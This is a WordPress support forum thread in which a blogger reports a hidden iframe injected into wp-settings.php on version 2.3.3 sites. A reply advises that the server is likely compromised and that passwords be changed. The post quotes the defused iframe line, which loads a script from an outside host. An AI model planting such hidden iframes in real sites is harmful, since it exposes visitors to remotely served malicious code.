• Hi ,
    i recently discovered in two blogs of mine running version 2.3.3 that the feeds were broken and were displaying instead an iframe code at the top of the feed.

    downloading all the wordpress files and scanning them for the displayed code i found in the wp-settings.php file the code below after the last closing php command.

    #iframe name=”StatPage” src=”https://golden-corps.com/script.php&#8221; width=5 height=5 style=”display:none”></iframe#

    I have replaced the end brackets with # to stop it working in this post.

    Both blogs had the same code to the same url. I have deleted the offending code in both blogs files and alerted my host to scan the server as i have 6 other blogs running 2.3.3 on the same machine, i have checked those and they seem ok so far. I wouldnt have know if i hadnt clicked on my own feed icon to see if the rss feed was displaying the correct posts as my front page seemed to have stopped updating a few days ago but if i clicked on a category i could see later posts.

    Regards

    Rob

Viewing 1 replies (of 1 total)
  • The fact that the attacker was able to write to the wp-settings.php file says to me that he compromised more than just your WordPress install: probably other areas of the server were involved, too. At this point he has the capability to log in as you, so be sure that once you fix everything (and I would recommend upgrading to 2.5 as well) that all your administrators change their passwords.

Viewing 1 replies (of 1 total)
  • The topic ‘possible iframe injection fault’ is closed to new replies.